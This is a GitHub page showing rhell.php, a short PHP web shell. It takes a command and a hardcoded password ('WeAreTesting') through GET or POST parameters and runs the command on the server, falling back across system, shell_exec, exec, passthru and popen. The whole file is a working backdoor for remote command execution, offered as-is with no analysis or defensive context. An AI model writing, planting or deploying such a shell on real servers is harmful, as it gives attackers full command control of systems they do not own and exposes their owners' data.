-
Notifications
You must be signed in to change notification settings - Fork 6
/
rhell.php
67 lines (54 loc) · 1.04 KB
/
rhell.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
<?php
error_reporting( E_ALL );
$cmd = "";
$password = "";
if ($_GET['cmd'] & $_GET['password'])
{
$cmd = urldecode($_GET['cmd']);
$password = urldecode($_GET['password']);
}
elseif ($_POST['cmd'] & $_POST['password'])
{
$cmd = $_POST['cmd'];
$password = $_POST['password'];
}
if ($password != "WeAreTesting") { echo "wrong password\n"; exit; }
run_command($cmd);
function run_command($cmd)
{
if (function_exists('system'))
{
system($cmd." 2>&1");
exit;
}
if (function_exists('shell_exec'))
{
echo shell_exec($cmd." 2>&1");
exit;
}
if (function_exists('exec'))
{
exec($cmd." 2>&1", $output);
echo implode("\n", $output);
echo "\n";
exit;
}
if (function_exists('passthru'))
{
passthru($cmd." 2>&1");
exit;
}
if (function_exists('popen'))
{
$handle = popen($cmd. " 2>&1", 'r');
while (!feof($handle)) {
echo fgets($handle);
}
$read = fread($handle, 10);
echo $read;
pclose($handle);
exit;
}
echo "We can't find a valid execution method. Tried: system, exec, shell_exec, passthru, popen.";
}
?>